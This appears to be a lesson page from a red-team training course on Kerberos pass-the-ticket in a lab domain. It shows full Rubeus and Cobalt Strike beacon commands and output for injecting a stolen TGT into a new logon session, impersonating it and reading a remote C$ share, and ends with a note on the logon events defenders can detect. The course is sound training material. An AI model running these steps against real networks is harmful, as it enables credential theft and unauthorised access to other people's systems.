Pass the Ticket

Pass the ticket is a technique that allows you to add Kerberos tickets to an existing logon session (LUID) that you have access to, or a new one you create. Accessing a remote resource will then allow that authentication to happen via Kerberos.

For this, we can leverage the TGT we extracted from jking's logon session on Workstation 2.

The first step is to create a blank, "sacrificial" logon session that we can pass the TGT into. We do this because a logon session can only hold a single TGT at a time. If we passed jking's TGT into the LUID for bfarmer, it would erase bfarmer's TGT and cause all sorts of authentication issues for the user.

Creating a new logon session and passing tickets into sessions other than your own requires elevated privileges.

Rubeus' createnetonly command will start a new hidden process of our choosing, using the CreateProcessWithLogonW API.

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe

[*] Action: Create Process (/netonly)

[*] Using random username and password.

[*] Showing process : False
[*] Username        : GJB9A2GP
[*] Domain          : VPY1XQRP
[*] Password        : R4ABN1K3
[+] Process         : 'C:\Windows\System32\cmd.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID       : 4748
[+] LUID            : 0x798c2c

This also creates a new LUID. It will have no tickets inside, so won't be visible with triage just yet. The next step is to pass the TGT into this new LUID using the Rubeus ptt command. Where the /luid is the new LUID we just created and /ticket is the base64 encoded ticket we previously extracted.

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe ptt /luid:0x798c2c /ticket:doIFuj[...snip...]lDLklP

[*] Action: Import Ticket
[*] Target LUID: 0x798c2c
[+] Ticket successfully imported!

Rubeus triage will now show jking's TGT inside this LUID.

 | 0x798c2c | jking @ DEV.CYBERBOTIC.IO    | krbtgt/DEV.CYBERBOTIC.IO                      | 9/1/2022 5:29:20 PM |

The final step is to impersonate the process that we created with createnetonly using Cobalt Strike's steal_token command. At a minimum, this requires the PID of the target process, which in this example, is 4748. We'll then be able to access the remote machine.

beacon> steal_token 4748

beacon> ls \\web.dev.cyberbotic.io\c$
[*] Listing: \\web.dev.cyberbotic.io\c$\

 Size     Type    Last Modified         Name
 ----     ----    -------------         ----
          dir     08/15/2022 18:50:13   $Recycle.Bin
          dir     08/10/2022 04:55:17   $WinREAgent
          dir     08/10/2022 05:05:53   Boot
          dir     08/18/2021 23:34:55   Documents and Settings
          dir     08/19/2021 06:24:49   EFI
          dir     08/15/2022 18:58:09   inetpub
          dir     05/08/2021 08:20:24   PerfLogs
          dir     08/24/2022 11:02:25   Program Files
          dir     08/10/2022 04:06:16   Program Files (x86)
          dir     08/31/2022 17:40:32   ProgramData
          dir     08/15/2022 18:31:08   Recovery
          dir     08/30/2022 11:16:24   System Volume Information
          dir     08/30/2022 17:51:08   Users
          dir     08/30/2022 20:19:27   Windows
 427kb    fil     08/10/2022 05:00:07   bootmgr
 1b       fil     05/08/2021 08:14:33   BOOTNXT
 12kb     fil     09/01/2022 07:26:41   DumpStack.log.tmp
 384mb    fil     09/01/2022 07:26:41   pagefile.sys

As before, use rev2self to drop the impersonation. To destroy the logon session we created, simply kill the process with the kill command.

beacon> rev2self
beacon> kill 4748

Rubeus triage will no longer show the logon session.

OPSEC By default, Rubeus will use a random username, domain and password with CreateProcessWithLogonW, which will appear in the associated 4624 logon event. The "Suspicious Logon Events" saved search will show 4624's where the TargetOutboundDomainName is not an expected value.

Last updated